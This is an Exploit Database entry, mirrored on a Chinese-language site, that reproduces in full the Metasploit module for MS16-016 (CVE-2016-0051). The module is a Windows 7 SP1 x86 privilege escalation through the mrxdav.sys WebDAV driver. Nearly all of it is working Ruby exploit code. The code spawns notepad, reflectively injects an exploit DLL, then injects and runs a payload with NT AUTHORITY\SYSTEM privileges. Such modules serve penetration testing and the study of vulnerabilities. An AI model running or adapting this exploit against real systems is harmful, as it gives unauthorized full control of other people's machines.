Microsoft Windows 7 SP1 – ‘mrxdav.sys’ WebDAV Privilege Escalation (MS16-016) (Metasploit)

• Exploit Database
• 16 阅读

• 作者： Metasploit
  日期： 2016-07-11
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40085/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  require 'msf/core/post/windows/reflective_dll_injection'
  require 'rex'
  
  class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
  
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection
  
  def initialize(info={})
  super(update_info(info, {
  'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
  'Description'=> %q{
  This module exploits the vulnerability in mrxdav.sys described by MS16-016.The module will spawn
  a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
  the specified payload within the context of the elevated process.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Tamas Koczka', # Original Exploit
  'William Webb <william_webb[at]rapid7.com>' # C port and Metasploit module
  ],
  'Arch' => ARCH_X86,
  'Platform' => 'win',
  'SessionTypes' => [ 'meterpreter' ],
  'DefaultOptions' =>
  {
  'EXITFUNC' => 'thread',
  'DisablePayloadHandler' => 'false'
  },
  'Targets'=>
  [
  [ 'Windows 7 SP1', { } ]
  ],
  'Payload'=>
  {
  'Space' => 4096,
  'DisableNops' => true
  },
  'References' =>
  [
  [ 'CVE', '2016-0051' ],
  [ 'MSB', 'MS16-016']
  ],
  'DisclosureDate' => 'Feb 09 2016',
  'DefaultTarget'=> 0
  }))
  end
  
  def check
  if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
  return Exploit::CheckCode::Safe
  end
  
  Exploit::CheckCode::Detected
  end
  
  def exploit
  if is_system?
  fail_with(Failure::None, 'Session is already elevated')
  end
  
  if sysinfo["Architecture"] =~ /wow64/i
  fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
  elsif sysinfo["Architecture"] =~ /x64/
  fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
  end
  
  print_status("Launching notepad to host the exploit...")
  notepad_process_pid = cmd_exec_get_pid("notepad.exe")
  begin
  process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
  print_good("Process #{process.pid} launched.")
  rescue Rex::Post::Meterpreter::RequestError
  print_status("Operation failed. Hosting exploit in the current process...")
  process = client.sys.process.open
  end
  
  print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
  library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
  library_path = ::File.expand_path(library_path)
  exploit_mem, offset = inject_dll_into_process(process, library_path)
  print_status("Exploit injected ... injecting payload into #{process.pid}...")
  payload_mem = inject_into_process(process, payload.encoded)
  thread = process.thread.create(exploit_mem + offset, payload_mem)
  sleep(3)
  print_status("Done.Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
  end
   end